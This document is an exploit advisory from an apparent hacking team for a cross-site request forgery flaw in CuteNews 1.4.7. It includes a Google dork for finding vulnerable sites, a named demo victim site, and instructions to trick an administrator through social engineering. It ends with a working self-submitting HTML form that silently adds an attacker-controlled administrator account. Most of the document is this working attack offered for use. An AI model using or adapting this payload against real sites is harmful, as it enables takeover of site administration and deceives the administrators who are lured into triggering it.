In The Name Of Allah
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# Exploit Title:Cute News -Add admin CSRF Vulnerablity
# Date :  2012-06-26   
# Author : Black-Hole   
# Vendor : http://cutephp.com/
# Version: 1.4.7      
# E-Mail: Gigelaknak [at] Yahoo [dot] com  
# Visit us: Ashiyane.org/forums 
# Category: Webapps 
# Google dork:"Powered by CuteNews 1.4.7"
# Demo site: http://www.rightclickimaging.co.uk/news/
# Team : Ashiyane Digitl Security Team
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

1.Replace your target path with http://localhost/cutenews/ at the second line of exploit code
2.Replace test1 with your username ,test2 with your password ,test3 with your nickname and your e-mail with Gigelaknak@yahoo.com
3.Save the exploit code as .html file and upload it some where ,Then give the link to admin using social engineering !


Tnx 2 N.A HiDdeEn ,Hijacker, Virangar, Iman_taktaz ...
And all Iranian Hackers ...
Special Tnx 2 All Ashiyane Members ...

Exploit Code :

<html>
<form method=post action="http://localhost/cutenews/index.php" name=csrf>
<input type=hidden name=regusername value=test1>
<input type=hidden name=regpassword value=test2>
<input type=hidden name=regnickname value=test3>
<input type=hidden name=regemail value=gigelaknak@yahoo.com>
<select name=reglevel>
<option value=1>1 (administrator)</option>
<input type=submit value="Add User">
<input type=hidden name=action value=adduser>
<input type=hidden name=mod value=editusers>
</select>
</form>
<script>document.csrf.submit();</script>
</html>